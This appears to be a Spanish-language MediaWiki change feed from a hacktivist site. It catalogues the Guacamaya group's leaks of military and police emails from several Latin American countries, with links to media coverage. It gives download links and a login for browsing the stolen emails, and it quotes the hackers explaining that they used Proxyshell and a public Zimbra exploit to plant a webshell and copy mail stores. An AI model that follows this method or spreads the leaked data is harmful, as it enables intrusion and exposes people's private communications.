También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://ddosecrets.com/wiki/Secretar%C3%ADa_de_la_Defensa_Nacional_de_M%C3%A9xico#Research<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
* https://www.proceso.com.mx/nacional/2022/11/6/cndh-estalla-por-reportaje-de-proceso-que-revela-ordenes-de-la-sedena-sobre-caso-ayotzinapa-296486.html<br />
* https://lasillarota.com/nacion/2022/11/11/guacamaya-leaks-sedena-pidio-zaldivar-suavizar-jueces-por-delitos-de-militares-401304.html<br />
* https://ejercitoespia.r3d.mx/<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm<br />
* https://www.elfaro.net/es/202210/el_salvador/26443/PNC-supo-de-la-liberaci%C3%B3n-ilegal-de-Crook-desde-noviembre-de-2021.htm<br />
<br />
=== Colombia ===<br />
* https://www.elespectador.com/judicial/coronel-r-santiago-herrera-el-confeso-autor-de-falsos-positivos-que-ahora-es-consultor-secreto-de-militares/</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=708Fuerzas Represivas2023-02-14T15:36:31Z<p>Enlacehacktivista: /* Cobertura mediática */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://ddosecrets.com/wiki/Secretar%C3%ADa_de_la_Defensa_Nacional_de_M%C3%A9xico#Research<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
* https://www.proceso.com.mx/nacional/2022/11/6/cndh-estalla-por-reportaje-de-proceso-que-revela-ordenes-de-la-sedena-sobre-caso-ayotzinapa-296486.html<br />
* https://lasillarota.com/nacion/2022/11/11/guacamaya-leaks-sedena-pidio-zaldivar-suavizar-jueces-por-delitos-de-militares-401304.html<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/22/correos-del-estado-mayor-conjunto-develan-temor-a-otro-catrillanca-y-debilidad-de-inteligencia.shtml<br />
* https://www.t13.cl/noticia/ex-ante/politica/filtracion-correos-militares-informe-efectos-detener-al-vocero-profugo-temucuicui<br />
* https://www.ciperchile.cl/2022/09/22/hackeo-masivo-al-estado-mayor-conjunto-expuso-miles-de-documentos-de-areas-sensibles-de-la-defensa/<br />
* https://www.biobiochile.cl/noticias/nacional/chile/2022/09/22/filtracion-de-correos-general-paiva-presenta-su-renuncia-a-jefatura-de-estado-mayor-conjunto.shtml<br />
* https://resumen.cl/articulos/pdi-investigaba-a-grupo-que-organizaba-recitales-poeticos-y-juntaba-dinero-para-revista-literaria-segun-documentos-filtrados-por-hackers<br />
* https://resumen.cl/articulos/autoridades-electas-del-biobio-eran-espiadas-por-fuerzas-armadas-y-la-ani-segun-revela-filtracion-hacker<br />
* https://interferencia.cl/articulos/hackeo-al-emco-la-colecta-de-la-armada-para-presos-de-punta-peuco-los-youtube-de-johannes<br />
* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm<br />
* https://www.elfaro.net/es/202210/el_salvador/26443/PNC-supo-de-la-liberaci%C3%B3n-ilegal-de-Crook-desde-noviembre-de-2021.htm<br />
<br />
=== Colombia ===<br />
* https://www.elespectador.com/judicial/coronel-r-santiago-herrera-el-confeso-autor-de-falsos-positivos-que-ahora-es-consultor-secreto-de-militares/</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Hacker_History&diff=707Hacker History2023-02-14T15:34:35Z<p>Enlacehacktivista: </p>
<hr />
<div>==2008==<br />
* [[Sarah Palin emails]]<br />
<br />
== 2010 ==<br />
* [[SRS Electronic Declaration System]]<br />
* [[Operation Payback]]<br />
<br />
== 2011 ==<br />
* [[Chinga la Migra]]<br />
* [[CorruptBrazil]]<br />
* [[Fuck FBI Friday]]<br />
* [[HBGary]]<br />
* [[LeakyMails]]<br />
* [[Shooting Sheriffs Saturday]]<br />
* [[Sownage]]<br />
* [[Stratfor]]<br />
<br />
== 2012 ==<br />
* [[Apple UDIDs]]<br />
* [[CSLEA]]<br />
* [[Norton AntiVirus]]<br />
* [[Syria emails]]<br />
* [[Bureau Of Justice]]<br />
<br />
== 2013 ==<br />
* [[Project AIG]]<br />
<br />
== 2014 ==<br />
* [[LulzSecPeru]]<br />
* [[Gamma Group]]<br />
* [[Russian Interior Ministry]]<br />
<br />
== 2015 ==<br />
* [[wikipedia:Football Leaks]]<br />
* [[Hacking Team]]<br />
<br />
== 2016 ==<br />
* [[Berat Albayrak Emails]]<br />
* [[Panama Papers]]<br />
* [[Surkov Leaks]]<br />
* [[Catalan police union]]<br />
<br />
== 2017 ==<br />
* [[Bob Otto emails]]<br />
* [[Cellebrite]]<br />
* [[Flexispy]]<br />
* [[Freedom Hosting II]]<br />
<br />
== 2018 ==<br />
* [[Salvini emails]]<br />
* [[Doxxing-Adventskalender]]<br />
<br />
== 2019 ==<br />
* [[GorraLeaks]]<br />
* [[Paco Leaks]]<br />
* [[Milico Leaks]]<br />
* [[Capital One]]<br />
* [[Perceptics]]<br />
* [[Cayman National Bank and Trust (Isle of Man)]]<br />
* [[Iron March]]<br />
* [[Varela Leaks]]<br />
<br />
== 2020 ==<br />
* [[Luanda Leaks]]<br />
* [[BlueLeaks]]<br />
* [[Intel exconfidential Lake]]<br />
<br />
== 2021 ==<br />
* [[Gab]]<br />
* [[Myanmar Investments]]<br />
* [[American Patriots Three Percent]]<br />
* [[Verkada]]<br />
* [[Sons of Confederate Veterans]]<br />
* [[MagaCoin]]<br />
* [[Electronic Arts]]<br />
* [[Tea Party Patriots]]<br />
* [[Cyber Partisans]]<br />
* [[HART]]<br />
* [[Policía Nacional Civil de El Salvador]]<br />
* [[Epik]]<br />
* [[Oath Keepers]]<br />
* [[America's Frontline Doctors]]<br />
* [[Twitch]]<br />
* [[Attila Hildmann]]<br />
* [[Metropolitan Police Department D.C.]]<br />
* [[Academy of Public Administration (Belarus)]]<br />
* [[AnibalLeaks]]<br />
<br />
== 2022 ==<br />
* [[Patriot Front]]<br />
* [[Belarusian Railway]]<br />
* [[Pronico]]<br />
* [[Roskomnadzor]]<br />
* [[OpRussia]]<br />
* [[Nauru Police Force]]<br />
* [[Extractivist Leaks/es]]<br />
* [[Uber]]<br />
* [[Liberty Counsel]]<br />
* [[Fiscalia|Fiscalia of Colombia]]<br />
* [[Fuerzas Represivas]]<br />
<br />
== 2023 ==<br />
* [[Odin Intelligence]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Odin_Intelligence&diff=706Odin Intelligence2023-02-14T15:33:57Z<p>Enlacehacktivista: Created page with "ODIN Intelligence is a police contractor, who markets products such as their "Homeless Management Information System" which uses "facial recognition technology" to help city police track (and harass) their houseless population, marketing it as a tool to deal with "problems" such as "degradation of a city's culture" and "poor hygiene". Read the full statement hackers posted on ODIN's website [https://enlacehacktivista.org/images/0/03/Odin.txt here.] Data from the hack is..."</p>
<hr />
<div>ODIN Intelligence is a police contractor, who markets products such as their "Homeless Management Information System" which uses "facial recognition technology" to help city police track (and harass) their houseless population, marketing it as a tool to deal with "problems" such as "degradation of a city's culture" and "poor hygiene". Read the full statement hackers posted on ODIN's website [https://enlacehacktivista.org/images/0/03/Odin.txt here.] Data from the hack is available [https://ddosecrets.com/wiki/ODIN_Intelligence from DDoSecrets.]<br />
<br />
== Media Coverage ==<br />
<br />
* https://techcrunch.com/2023/01/21/odin-intelligence-breach-police-surveillance/<br />
* https://www.vice.com/en/article/xgyjnq/odin-intelligence-hacked</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=File:Odin.txt&diff=705File:Odin.txt2023-02-14T15:23:14Z<p>Enlacehacktivista: text posted on (hacked) website of ODIN Intelligence</p>
<hr />
<div>== Summary ==<br />
text posted on (hacked) website of ODIN Intelligence</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Guacamaya&diff=681Guacamaya2023-01-31T00:15:04Z<p>Enlacehacktivista: /* Entrevistas */</p>
<hr />
<div>[[File:Guacamayas.jpeg|thumb|el colectivo]]<br />
Guacamaya es un grupo de hackers que busca la liberación de los pueblos y el territorio de Abya Yala, hasta ahora enfocándose en hackear a empresas extractivistas y fuerzas represivas (policia y militar)<br />
<br><br />
Nunca tendrán cuentas en redes sociales. [https://twitter.com/guacamayahacks Estas] [https://twitter.com/GuacamayanLeaks cuentas] son [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsas.]<br />
<br />
== Hackeos ==<br />
<br />
* [[Pronico]]<br />
* [[Extractivist Leaks/es|Extractivist Leaks]]<br />
* [[Fiscalia|Fiscalia de Colombia]]<br />
* [[Fuerzas Represivas]]<br />
<br />
== Comunicados ==<br />
* [https://enlacehacktivista.org/comunicado_guacamaya.txt Pronico]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya2.txt Extractivist Leaks]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya3.txt Fiscalia de Colombia]<br />
* [https://enlacehacktivista.org/comunicado_guacamaya4.txt Fuerzas Represivas]<br />
<br />
== Poemas ==<br />
* https://enlacehacktivista.org/poema_guacamaya.txt<br />
<br />
== Videos ==<br />
* [https://enlacehacktivista.org/hackback.webm Hackeo de Pronico]<br />
* [https://enlacehacktivista.org/hackback2.webm Explotación de Proxyshell] usado en todos los hackeos de [[Extractivist Leaks/es|Extractivist Leaks]], [[Fiscalia|Fiscalia de Colombia]], y [[Fuerzas Represivas]] con la excepción de [[Fuerzas Represivas#Explicación del Hackeo|Sedena.]]<br />
<br />
== Entrevistas ==<br />
* https://forbiddenstories.org/es/la-lucha-por-un-territorio-es-la-lucha-de-todas/<br />
* https://la-lista.com/mexico/2022/10/10/hackers-guacamaya-entrevista-exclusiva-con-el-grupo-hacktivista<br />
* https://www.vice.com/en/article/5d39j3/meet-the-environmental-hacktivists-trying-to-sabotage-mining-companies<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://loquesigue.tv/quien-esta-detras-de-los-guacamayaleaks-entrevista-al-colectivo-guacamaya/<br />
* https://www.ultimominuto.news/noticias/Entrevista-con-Guacamaya-Cual-fue-el-hallazgo-mas-importante-del-hackeo-20221016-0016.html<br />
* https://es.globalvoices.org/2022/11/30/guacamaya-el-hackeo-debe-servir-para-despertar-y-rebelarse/<br />
* https://cyberscoop.com/guacamaya-hacktivist-group-latin-america-interview/<br />
<br />
== Ilustraciones ==<br />
<br />
[[File:Resistencia_Milenaria.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_mina.png|400px|border|Fin de la mina]]<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
<br />
[[Category:Hackers]]</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Hacker_History&diff=680Hacker History2023-01-30T23:59:11Z<p>Enlacehacktivista: </p>
<hr />
<div>==2008==<br />
* [[Sarah Palin emails]]<br />
<br />
== 2010 ==<br />
* [[SRS Electronic Declaration System]]<br />
* [[Operation Payback]]<br />
<br />
== 2011 ==<br />
* [[Chinga la Migra]]<br />
* [[CorruptBrazil]]<br />
* [[Fuck FBI Friday]]<br />
* [[HBGary]]<br />
* [[LeakyMails]]<br />
* [[Shooting Sheriffs Saturday]]<br />
* [[Sownage]]<br />
* [[Stratfor]]<br />
<br />
== 2012 ==<br />
* [[Apple UDIDs]]<br />
* [[CSLEA]]<br />
* [[Norton AntiVirus]]<br />
* [[Syria emails]]<br />
* [[Bureau Of Justice]]<br />
<br />
== 2013 ==<br />
* [[Project AIG]]<br />
<br />
== 2014 ==<br />
* [[LulzSecPeru]]<br />
* [[Gamma Group]]<br />
* [[Russian Interior Ministry]]<br />
<br />
== 2015 ==<br />
* [[wikipedia:Football Leaks]]<br />
